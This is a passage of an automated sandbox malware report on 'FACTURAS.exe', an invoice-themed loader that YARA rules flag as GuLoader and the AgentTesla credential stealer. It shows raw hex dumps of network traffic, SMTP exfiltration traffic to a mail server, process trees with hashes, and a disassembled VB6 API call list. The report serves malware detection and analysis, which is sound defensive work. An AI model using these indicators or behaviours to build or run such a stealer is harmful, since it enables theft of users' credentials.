20 ad 43 41 5b b3 b9 55 49 83 c6 aa 76 57 b3 fb 99 35 c0 72 5b 73 8f ee 17 12 fe 12 27 21 d5 0e f8 8e c1 b8 03 ce 40 9e e6 6f ea 0f 5f a7 9e 1f 76 de 87 27 f2 00 ab b4 93 1d 31 9b e0 ec cf 7c a1 20 c0 43 59 ff ab 6d 64 c6 93 Data Ascii: ,SN49=j-{`V-'_HQSF[[S,~Pm,9E+b#.e`!-BUPw4- y{eK>9`w -qR V(}LpV`8GCs\,dc3 CA[UIvW5r[s'!@o_v'1\| CYmd
2021-12-01 12:26:35 UTC	209	IN	Data Raw: 4c 63 44 90 1e a6 25 08 7e ee 1f a8 f8 00 fc 72 53 56 6a 50 e8 8e 5f 1d 25 e8 09 b7 10 94 7a 05 08 39 bb e6 c9 ec 4c 45 12 8a b8 bd 8d 70 60 79 f9 11 64 47 1e 48 73 96 32 96 2d 0e 85 bc d6 ef 8e 33 14 e6 fe 01 d3 a2 c1 ba 67 ff d9 fa 21 67 9d 22 16 cf bc b1 44 1d 76 99 c5 ad 16 5e 21 84 39 fe fc 46 6d c1 11 60 11 e9 4f d9 43 63 18 57 e9 a3 b1 1f c7 fd 3f c5 3f 48 a7 e0 e1 00 3e 34 b8 4f 8f 86 af 7b 31 2b b4 2e e2 b4 c6 b0 70 20 77 dc 39 30 d6 6a 4b 4a 91 62 b5 fe 3b e4 11 f0 ad d7 96 a3 40 70 e7 56 91 d7 6b 40 a9 8b b0 5d e0 88 ee d7 17 b9 42 67 28 f2 2f e0 a9 e9 7c 42 8e c5 7e 2f 9b c6 d0 22 a8 df 85 7b 5e 78 5f 41 5a c3 0f b7 07 ac fc 01 56 9b d8 ce 17 0c d1 10 b1 d8 5c b5 a4 6f 63 3d 17 79 66 d1 84 42 ff 3d 81 75 8a fe 47 71 ee 21 80 95 95 2b 57 22 3b Data Ascii: LcD%~rSVjP_%z9LEp`ydGHs2-3g!g"Dv^!9Fm`OCcW??H>4O{1+.p w90jKJb;@pVk@]Bg(/\|B~/"{^x_AZV\oc=yfB=uGq!+W";
2021-12-01 12:26:35 UTC	210	IN	Data Raw: 49 9f 0f 15 7a 0b e2 25 c3 2f 95 83 09 a7 e9 66 74 63 15 9a 29 a1 83 80 36 47 68 c1 06 dd 20 e4 e6 23 05 49 dd f3 a7 7b 9c 0f 84 11 98 b1 53 b7 fc 78 e4 18 cd 43 f7 38 70 ea 53 02 8d 38 e1 22 9b 53 94 d1 d0 06 93 a9 99 cf 46 a1 21 b0 16 96 82 44 f9 3d 55 7e 1b c1 63 12 da 92 cb cf 36 e8 31 23 58 79 ee 40 6f 40 94 1d b4 aa 8f 6c 6d c4 b4 9f 08 f9 50 50 4a 73 46 f7 a9 52 00 2b 7d 9e 32 bd 94 65 08 12 25 a4 f3 db ff 52 5c 0e 96 b8 ad 8b 78 69 6b 7a 9c 76 5f 02 55 60 82 57 90 0f 12 8b 3e 4c ff 9c b3 84 f5 89 05 d4 b6 d2 35 ec fe c4 fb 2a 49 9e 36 16 c5 bb bf 56 81 cf 86 c1 bb 7b 59 03 9a 2d 83 f3 45 76 e1 0f 67 3f f7 4a d1 51 6b 07 41 ef a1 b8 00 57 54 3a db 3e 53 bc 64 6c 01 32 b4 f9 ea a8 c5 b3 ee e6 ae 2d 2e fa a8 44 f4 73 32 69 d9 31 30 d8 ff 94 d9 88 b2 Data Ascii: Iz%/ftc)6Gh #I{SxC8pS8"SF!D=U~c61#Xy@o@lmPPJsFR+}2e%R\xikzv_U`W>L5*I6V{Y-Evg?JQkAWT:>Sdl2-.Ds2i10
2021-12-01 12:26:35 UTC	211	IN	Data Raw: 1f ac c3 9c a2 af 32 ac b4 e8 6e 6f 50 29 3b 7f 58 ac d4 75 ae f7 f8 f7 2c ca dc a2 1d 91 65 03 2c c4 78 a4 12 b2 fa 77 3b 10 42 aa 5f 94 f9 3d 3a a6 24 35 37 5e 9a c4 32 c7 1c 58 b3 18 73 69 43 63 58 37 4e 76 94 e7 ca 67 fe 48 31 40 6c 3f b3 4d 4e de 85 80 d3 85 e5 18 f7 63 c7 54 3a da 75 24 f0 83 ea eb 38 15 84 37 62 63 49 a6 10 df 0b 00 1e 3f 56 f4 3b 3f d1 16 4d 9f 46 c4 e8 51 fc 27 ac 29 e3 47 26 83 ea 95 c6 59 cc c8 8a f8 3c f5 97 7e d5 2e 0c 3e 0b 1d b5 59 cb 96 a6 82 fe b1 dc b6 97 80 6a 9c b0 f0 32 a9 30 e5 2b 97 26 cb fb 76 d4 0e 1f 5a 51 f8 39 ba 3d c7 df 3a 38 cb b1 45 14 37 48 f6 c7 42 b8 16 32 13 d6 82 6b 79 80 63 5a d1 b1 13 9a f6 b0 fa 54 b9 a5 e2 88 1e 96 64 36 c7 db 69 28 8e e6 44 92 6e c2 c2 ff 0f e2 e7 83 8e a8 15 dd 3d aa 3a 01 bf c7 Data Ascii: 2noP);Xu,e,xw;B_=:$57^2XsiCcX7NvgH1@l?MNcT:u$87bcI?V;?MFQ')G&Y<~.>Yj20+&vZQ9=:8E7HB2kycZTd6i(Dn=:
2021-12-01 12:26:35 UTC	212	IN	Data Raw: 2f 4b 65 d5 4c 63 57 9d 10 a8 3e 1f fc 5c 13 a8 f8 06 e4 5c 5a 77 76 5d fc 2c f3 1e 24 68 9f b2 37 80 69 8a a3 3b b6 e0 cc c2 4e 54 03 09 0b b1 98 70 72 6a 7e 95 7b c0 af 4a 60 8a 5f 94 0f 1c 16 09 59 6a 6a 28 12 fe 99 10 c1 21 c9 b6 6f f1 d4 f5 32 67 91 2b 03 dc 3f 0e 57 93 dd 92 de b1 72 5f 04 88 25 9d e0 2d 75 ef 15 61 1c f4 45 d7 4c 79 11 54 fb b2 2c 8b d7 d7 26 cb 2c c4 1b f7 88 12 ad 15 7f 6a ae 94 3f 42 fa 2a 94 2f fd 38 78 b6 50 3d 75 59 fe 36 c1 ea 87 45 1f bd a8 79 e8 e3 83 a8 3a d0 98 bf 5c fe 32 45 9a df 46 55 39 7b a4 fc 78 88 ee d6 b2 a8 70 e7 b0 fb 24 d5 bb 7a 65 92 99 64 3e 33 15 1d c4 82 09 d0 85 92 83 76 5d 5b c9 03 d0 cc 8f 60 e0 89 89 86 de cd 15 34 c5 1d 3b 16 60 b0 8e 65 51 be 87 7a 77 52 64 41 fe 5d 84 67 0a b6 55 78 c0 2e e4 88 ff Data Ascii: /KeLcW>\\Zwv],$h7i;NTprj~{J`_Yjj(!o2g+?Wr_%-uaELyT,&,j?B*/8xP=uY6Ey:\2EFU9{xp$zed>3v][`4;`eQzwRdA]gUx.
2021-12-01 12:26:35 UTC	214	IN	Data Raw: a5 f3 82 e1 d9 b8 5b 9d 14 60 6d 4d b4 17 d7 19 01 09 16 42 76 18 3e c6 71 5e 9d 5c db e8 48 fc 20 ad 01 e1 57 b9 b3 ea 95 c6 59 98 c8 a6 f0 2b 6b 83 60 c6 3c 04 2e 81 12 97 55 c4 90 b3 9a f5 ac df b9 96 97 57 9a b0 e9 33 bb 3f 75 3f 96 3b ca fb 76 c7 16 12 5a 44 c9 2c 20 3d c8 5b ad 24 dc 22 87 0c 37 4b 62 db 55 24 53 21 0a c5 89 6d 6a 98 68 5a d2 ac 12 97 f6 bb fb 4d b7 35 76 d5 09 f1 7e 42 c3 e6 77 34 81 fb 4b 8e 61 c5 c0 e8 0f e2 57 8f 8e 8e 0f c9 35 bd b2 9f bb c8 99 45 bf e8 60 e3 70 a1 36 1c 3e ef 12 62 dc 32 c8 05 7a 41 54 93 24 51 f5 75 27 89 f1 82 c4 86 e4 60 ce a3 be 67 45 f7 e5 01 69 ee 06 ce d9 67 6f 35 92 19 79 3a 0a 64 2a 2b 01 9b 46 cd 34 bd 7b 09 36 25 27 f6 6e 25 e6 cc b1 c6 f9 c9 d5 a8 bd fa 45 6d 2e 5e 00 ef 25 19 99 8a f1 4b db 20 33 Data Ascii: [`mMBv>q^\H WY+k`<.UW3?u?;vZD, =[$"7KbU$S!mjhZM5v~Bw4KaW5E`p6>b2zAT$Qu'`gEigo5y:d*+F4{6%'n%Em.^%K 3
2021-12-01 12:26:35 UTC	215	IN	Data Raw: 56 0f 9b 23 8e fa 59 60 fc 1b 7c 17 fd 43 d1 5f 63 1e 4c e6 a8 a5 00 bf d1 33 cd 23 4e ab e5 e3 02 22 ba 50 4d bd 93 af 7a 6d 2e a6 ae af b4 cb a5 62 bd fe da 2d bf 84 e4 88 56 0c bd af 63 eb fe 8c 2c be d4 9e b0 d3 b0 28 31 9c df 61 55 21 60 b8 73 ef 81 f2 5f fa a6 65 6a 35 e8 a8 f5 a7 e6 f9 8e 8e f8 7b 2f 99 96 cb 07 b4 db 85 79 96 76 5d 5b 21 44 c2 a7 9b 60 eb 9c 86 97 da d4 99 f5 c4 0f ab 59 fd bb b3 60 51 bd 2f 65 1e 54 51 53 6d 47 bc 7f ab f3 53 6b cb 2a 80 95 93 2b 5a 05 1a a3 2c d4 8d 5d b9 d5 fa 09 99 15 ad 0e 99 e5 a0 ca 19 4d c1 0e 37 70 9f dc c6 a0 12 9a 35 63 50 e8 4a 98 77 22 a2 29 87 f6 e5 0d 70 fb 62 d5 f5 c7 06 1f 1f 26 0d 19 8d 81 d7 62 b0 b8 46 86 5f ff 11 04 46 eb fa ab 07 40 b9 45 4d bb b4 8b bb 1f bb e0 3f 18 4f 40 11 48 b5 95 81 e2 Data Ascii: V#Y`\|C_cL3#N"PMzm.b-Vc,(1aU!`s_ej5{/yv][!D`Y`Q/eTQSmGSk*+Z,]M7p5cPJw")pb&bF_F@EM?O@H
2021-12-01 12:26:35 UTC	216	IN	Data Raw: a6 c7 19 25 ce fd da 47 a5 17 28 16 cb 87 61 98 9e 66 48 57 aa 1f 1f 77 b1 a7 51 ab 27 f3 95 19 98 76 5b c0 ff 6b 29 99 e6 47 93 63 c6 cf ea 1d 60 ea 71 80 a6 08 dc 20 a0 33 06 be da e8 05 aa f8 e7 7d 73 b5 bc 59 30 ee 0d fe 7e 39 dc 9a 6e cf ee 14 63 5d f5 6f 46 93 74 03 cd 86 e7 6d cf a7 b2 63 43 f7 f1 0d ee ab 06 c6 d2 6a 41 39 89 93 3c 38 2a 66 26 2f 0e 94 47 c6 3e b6 7b 05 33 04 2b fe 6e 2d f7 ca b1 c3 f6 c9 c6 aa b2 f6 51 69 3c 5e 0f f6 b1 9f 9a 97 eb c2 46 01 3c 1b 3e 7b a3 23 ca fd 3b f0 87 8a 57 d6 36 9f 98 28 8b d9 1d 8b 11 7e 06 7d b8 ce 2f 96 85 04 20 6f 76 e5 8b 10 9d 29 a4 96 23 b6 41 66 d2 0a c8 37 f6 65 b0 9b 5e a6 6d bf 75 03 16 9d 0e 94 2d ef b1 fb 65 ff 1b 7b cc f3 23 79 e6 45 0c b0 2d fe 37 1b f6 96 d1 cb 1a 91 bf 99 d5 74 a8 34 a4 03 Data Ascii: %G(afHWwQ'v[k)Gc`q 3}sY0~9nc]oFtmcCjA9<8*f&/G>{3+n-Qi<^F<>{#;W6(~}/ ov)#Af7e^mu-e{#yE-7t4
2021-12-01 12:26:35 UTC	218	IN	Data Raw: 05 81 0b 01 6c bd ce 01 56 e6 a1 d7 97 f9 99 eb bc 47 59 c3 3b ad 80 7f fc 01 67 94 5d 38 9b fd da 1e 39 3f 6e 35 7b 74 c3 c7 14 7f 70 53 63 d3 93 d6 05 84 80 d6 5f 64 4e ce 99 08 78 2d 51 2b 1d a5 33 c5 09 b6 b3 d9 d2 08 8b 94 5d 11 36 0a a4 cd 8b 19 49 8e 1c ff d7 c9 a0 bc 87 64 a6 7a bd e8 cc d4 64 22 be a0 c9 e5 fe 12 fc 49 68 c6 ee dd 99 18 14 08 07 0d 8d 83 8e 6e b0 b8 47 86 5c f8 0a 8d d1 eb fa 8b 06 72 b0 42 de a7 2e 80 ae 99 5f e8 28 84 d3 4f 0b c0 5f 92 89 ed 2b 2b 4b 5b 22 57 72 9c 17 bb d8 27 aa 4e 3a e6 5d 0e 39 ac d3 19 8a a2 1a a5 89 ed 66 78 d9 b8 36 6d dc 5d dd 6f ac e8 f3 fd 21 55 f1 bb 02 ea 67 04 28 c5 79 aa 03 3a c4 75 06 17 5d bd d7 70 ff 31 1a a6 23 29 bf b7 88 45 fa ce 15 59 a9 1e 68 eb cd e1 85 37 4c 70 8e c2 d5 68 e9 5c af 94 68 Data Ascii: lVGY;g]89?n5{tpSc_dNx-Q+3]6Idzd"IhnG\rB._(O_++K["Wr'N:]9fx6m]o!Ug(y:u]p1#)EYh7Lph\h
2021-12-01 12:26:35 UTC	219	IN	Data Raw: bb 49 4a fe f8 02 6a 3a 0f dc 5b 67 42 3c 8c 89 b5 a1 04 75 a5 b8 0c 96 47 df b4 b6 62 8c 32 2c 34 f0 6e 38 e7 c5 bc cd e4 d0 5a 05 bb ee cc 6b 27 76 0a f5 b3 83 9c 83 e4 ea 40 33 bc 87 3d 78 ab 34 ca ff 1f e0 16 8a 4e 50 9f 99 89 a8 87 c2 b6 0a 00 6a 96 67 38 d5 ae 9c 89 13 b1 6c 5a 6d 2a 12 9c 3a 2d ba bd 32 58 63 db 0b d3 3a fe 7a a7 04 5e bc e7 b2 64 8b 12 91 19 95 ac 41 a9 fb 74 e6 0a e6 4d ec 04 6f f9 4b 18 b6 29 90 26 f3 52 ff cd f4 06 aa b5 b7 dd 65 a8 32 b1 0e 85 9a 4a d0 28 5f 61 17 dc 77 0e c4 88 f6 dd 36 e8 24 29 45 6a de 5e 68 6a 92 03 a3 29 1e 79 e5 0d bb f3 13 e5 4f 4d 4a 6a 55 f2 b3 5b 14 33 6e 9e 37 31 90 7b 08 1c bd b9 e8 c0 e0 53 44 00 e2 b0 93 88 6d 64 76 7c 9d 6f 5f 1b 42 69 82 4a 96 10 0b 99 34 43 e2 84 32 16 f1 99 14 57 a6 d2 30 68 Data Ascii: IJj:[gB<uGb2,4n8Zk'v@3=x4NPjg8lZm*:-2Xc:z^dAtMoK)&Re2J(_aw6$)Ej^hj)yOMJjU[3n71{SDmdv\|o_BiJ4C2W0h
2021-12-01 12:26:35 UTC	220	IN	Data Raw: fa cb d8 79 2c b0 a8 c7 f8 f0 1c f2 4a 60 db e0 d5 84 16 1d 28 03 0c 9c 03 66 60 be b6 4f 81 5a f1 03 85 db e3 f2 a3 01 60 b8 57 cc 26 b7 81 bc 19 b3 fd 3a 05 4a 4e 19 40 b3 95 83 e4 39 aa 3e 59 25 50 78 95 1e bc d1 36 2b 77 33 f4 dd e2 3f ac d1 1e 97 a7 12 af a9 ed 73 6a 58 21 37 7f 5c b1 d1 68 ab ea fd ff 3d 48 ed a6 1e f7 65 03 28 c7 78 a4 12 bb fd 72 26 15 5f af 57 9c f1 38 3a a4 21 3b 3f 5b 9a c5 2f c2 12 5f b6 1b 72 e9 df 61 70 2a 49 f8 91 e2 d7 62 db 4d 2c c5 62 23 af 50 4b cc 07 95 c1 07 f4 05 f4 7e da 49 27 c7 77 26 a6 80 ef 4b 39 1b 99 34 60 7e 4c a0 10 dd 17 1c 0c 0a 51 f4 38 22 d4 18 2b 98 41 47 f5 54 e1 22 a4 21 e3 45 3b 86 f7 90 db 5c 95 cf a0 ed 2e 77 1e 7c db 20 19 2c 89 14 b7 57 c5 9e ae 9f fb ac d9 b8 8b 85 62 94 ad f5 be b5 22 67 aa 1f Data Ascii: y,J`(f`OZ`W&:JN@9>Y%Px6+w3?sjX!7\h=He(xr&_W8:!;?[/_rap*IbM,b#PK~I'w&K94`~LQ8"+AGT"!E;\.w\| ,Wb"g
2021-12-01 12:26:35 UTC	221	IN	Data Raw: 34 a3 25 a5 a7 80 17 65 46 f3 21 f4 00 84 02 d3 6c 3e c7 9b df 03 c4 6b fc 70 f0 d9 2a d8 95 28 9d 7c 9d 21 ca 48 08 92 2b 7c 85 07 82 55 d2 3c e8 a2 aa 63 e9 97 a5 a8 1a ee 5f cf 6e eb ec 6b ee 46 36 10 78 a4 49 3c f8 8d f4 e1 0b d4 0c 0d 65 57 f4 30 08 3b e6 7b d5 5f 6b 1a bd 63 cf 80 67 95 37 36 32 05 76 e3 a4 7e 3c 17 48 b0 9c 43 f0 18 7d 7c 50 cc 97 f9 ef 44 61 32 b7 95 c7 f9 05 12 1f 30 ee 0c 2d 20 45 64 b8 78 f2 7e 7d f2 51 29 86 f7 0c 18 fe 97 05 d3 a3 c0 b4 61 ff da fb 2f 69 9f 25 16 cd bd bf 55 9d d3 9a c3 bf 7b 58 01 86 2b 93 f2 44 68 e1 13 61 1f f5 4b d9 42 6b 16 51 ee a0 ad 12 d6 d9 3b c5 3e 46 ae e5 e1 00 2c b4 79 4a af 86 bd fb f4 2f b4 2f ef ba c5 b0 70 3c 67 db 3f 3e c4 ea 86 58 11 b3 a7 7e ee f6 91 29 a3 d1 96 a2 52 f0 3a 58 94 d7 6b 52 Data Ascii: 4%eF!l>kp*(\|!H+\|U<c_nkF6xI<eW0;{_kcg762v~<HC}\|PDa20- Edx~}Q)a/i%U{X+DhaKBkQ;>F,yJ//p<g?>X~)R:XkR

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Dec 1, 2021 13:28:11.632350922 CET	587	49815	116.202.203.61	192.168.11.20	220-server.infomedya.net ESMTP Exim 4.94.2 #2 Wed, 01 Dec 2021 15:28:11 +0300 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Dec 1, 2021 13:28:11.632638931 CET	49815	587	192.168.11.20	116.202.203.61	EHLO 648351
Dec 1, 2021 13:28:11.645721912 CET	587	49815	116.202.203.61	192.168.11.20	250-server.infomedya.net Hello 648351 [102.129.143.30] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-STARTTLS 250 HELP
Dec 1, 2021 13:28:11.645993948 CET	49815	587	192.168.11.20	116.202.203.61	STARTTLS
Dec 1, 2021 13:28:11.663474083 CET	587	49815	116.202.203.61	192.168.11.20	220 TLS go ahead

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: FACTURAS.exe PID: 592 Parent PID: 7644

General

Start time:	13:25:53
Start date:	01/12/2021
Path:	C:\Users\user\Desktop\FACTURAS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FACTURAS.exe"
Imagebase:	0x400000
File size:	152720 bytes
MD5 hash:	AB82F374210A08B2221D5E1807400A32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: CasPol.exe PID: 432 Parent PID: 592

General

Start time:	13:26:13
Start date:	01/12/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\FACTURAS.exe"
Imagebase:	0x480000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: CasPol.exe PID: 1268 Parent PID: 592

General

Start time:	13:26:14
Start date:	01/12/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FACTURAS.exe"
Imagebase:	0xcc0000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.24364934028.0000000001100000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 7140 Parent PID: 1268

General

Start time:	13:26:14
Start date:	01/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6a5840000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: FACTURAS.exe PID: 592 Parent PID: 7644 FACTURAS.exeCOMMON

Executed Functions

Function 00403540, Relevance: 1.6, APIs: 1, Instructions: 367memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0BA0867C,-9ADFD688,-00000001D10E6538), ref: 0040388A

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b2fff52c35f55826a747af9553781bdc6a20c40d9e410b2cd1b23bea76177296
Instruction ID: dcb234ffe1badf31ed07c6e26d8634e1f6a6ece39ec117f6548178b5362ed6b8
Opcode Fuzzy Hash: b2fff52c35f55826a747af9553781bdc6a20c40d9e410b2cd1b23bea76177296
Instruction Fuzzy Hash: 26E1D57144E2C55FD7834F34C8B539ABFB4EF43699F9914CAE8C24A193D26845C8CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0041C3E4, Relevance: 375.8, APIs: 174, Strings: 40, Instructions: 1267COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041C402
__vbaAryConstruct2.MSVBVM60(?,004029BC,00000002,?,?,?,?,00401546), ref: 0041C43C
__vbaVarDup.MSVBVM60 ref: 0041C461
#522.MSVBVM60(?,?), ref: 0041C474
__vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C487
#713.MSVBVM60(00000000,?,?,?,?), ref: 0041C48D
#558.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C4A9
__vbaFreeStr.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C4C3
__vbaFreeVarList.MSVBVM60(00000003,?,?,00000008,00000008,00000000,?,?,?,?), ref: 0041C4DF
#541.MSVBVM60(?,7:7:7,?,?,?,00401546), ref: 0041C502
__vbaStrVarMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C50E
__vbaStrMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C518
__vbaFreeVar.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C523
__vbaVarDup.MSVBVM60 ref: 0041C548
#524.MSVBVM60(?,?), ref: 0041C55B
__vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C56E
#690.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C583
__vbaFreeStr.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C58E
__vbaFreeVarList.MSVBVM60(00000002,?,?,multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C5A3
#610.MSVBVM60(?,?,?,?,00401546), ref: 0041C5B2
#661.MSVBVM60(?,0040250C,?,?,?,?,?,?,?,00401546), ref: 0041C5D5
__vbaVarTstGe.MSVBVM60(00008002,?), ref: 0041C5FC
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?), ref: 0041C618
#705.MSVBVM60(00000002,00000000), ref: 0041C648
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041C652
__vbaFreeVar.MSVBVM60(00000002,00000000), ref: 0041C65D
#670.MSVBVM60(00000002,00000002,00000000), ref: 0041C669
__vbaStrVarMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C675
__vbaStrMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C67F
__vbaFreeVar.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C68A
__vbaVarDup.MSVBVM60 ref: 0041C6AF
#560.MSVBVM60(?), ref: 0041C6BB
__vbaFreeVar.MSVBVM60(?), ref: 0041C6D8
#648.MSVBVM60(0000000A,?), ref: 0041C718
__vbaFreeVar.MSVBVM60(0000000A,?), ref: 0041C72F
__vbaVarDup.MSVBVM60(0000000A,?), ref: 0041C790
#606.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041C79E
__vbaStrMove.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041C7AB
__vbaLenBstr.MSVBVM60(00000000,00000010,0000000A,0000000A,?), ref: 0041C7B1
#574.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C7CD
__vbaStrMove.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C7DA
#696.MSVBVM60(00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C7E0
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C802
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041C81A
#648.MSVBVM60(0000000A), ref: 0041C86A
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041C882
#696.MSVBVM60(OFFENTLIGHEDSSFRE,0000000A), ref: 0041C8B9
#696.MSVBVM60(Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041C8FD
__vbaNew2.MSVBVM60(0040258C,004223C0,Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041C922
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014), ref: 0041C987
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,00000070), ref: 0041C9E3
__vbaFreeObj.MSVBVM60(00000000,?,0040259C,00000070), ref: 0041CA08
#519.MSVBVM60(tilskrersaksene,?), ref: 0041CA12
__vbaStrMove.MSVBVM60(tilskrersaksene,?), ref: 0041CA1F
#519.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CA25
__vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CA32
__vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CA56
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041CA96
#648.MSVBVM60(0000000A), ref: 0041CAB9
__vbaStrCopy.MSVBVM60 ref: 0041CAD9
__vbaFreeStr.MSVBVM60 ref: 0041CB3D
__vbaFreeVar.MSVBVM60 ref: 0041CB48
#527.MSVBVM60(Forretningsbrevet5), ref: 0041CB5C
__vbaStrMove.MSVBVM60(Forretningsbrevet5), ref: 0041CB69
__vbaFreeStr.MSVBVM60 ref: 0041CB8A
__vbaStrCopy.MSVBVM60 ref: 0041CB9A
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,000006F8), ref: 0041CBE2
__vbaStrMove.MSVBVM60(00000000,00401260,00402330,000006F8), ref: 0041CC12
__vbaFreeStr.MSVBVM60(00000000,00401260,00402330,000006F8), ref: 0041CC1D
#535.MSVBVM60(00000000,00401260,00402330,000006F8), ref: 0041CC22
#564.MSVBVM60(00000004,?), ref: 0041CC51
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041CC6B
#685.MSVBVM60(00000004,?), ref: 0041CC7F
__vbaObjSet.MSVBVM60(?,00000000,00000004,?), ref: 0041CC8C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040265C,0000001C), ref: 0041CCD3
__vbaI4Var.MSVBVM60(?), ref: 0041CD02
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,000006FC), ref: 0041CD6E
__vbaFreeObj.MSVBVM60(00000000,00401260,00402330,000006FC), ref: 0041CD88
__vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 0041CD9D
#537.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CDAA
__vbaStrMove.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CDB7
#696.MSVBVM60(00000000,0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CDBD
#648.MSVBVM60(0000000A), ref: 0041CDE4
__vbaR8FixI4.MSVBVM60(0000000A), ref: 0041CDF6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,00000700), ref: 0041CE6C
__vbaFreeStr.MSVBVM60(00000000,00401260,00402330,00000700), ref: 0041CE86
__vbaFreeVar.MSVBVM60(00000000,00401260,00402330,00000700), ref: 0041CE91
#648.MSVBVM60(0000000A), ref: 0041CEB1
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,00000704), ref: 0041CF07
__vbaFreeVar.MSVBVM60(00000000,00401260,00402330,00000704), ref: 0041CF21
#648.MSVBVM60(0000000A), ref: 0041CF41
#714.MSVBVM60(?,00000004,00000000,0000000A), ref: 0041CF73
#648.MSVBVM60(0000000A,?,00000004,00000000,0000000A), ref: 0041CF93
#564.MSVBVM60(00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CFC3
__vbaHresultCheck.MSVBVM60(00000000,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CFDD
__vbaI4Var.MSVBVM60(?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D010
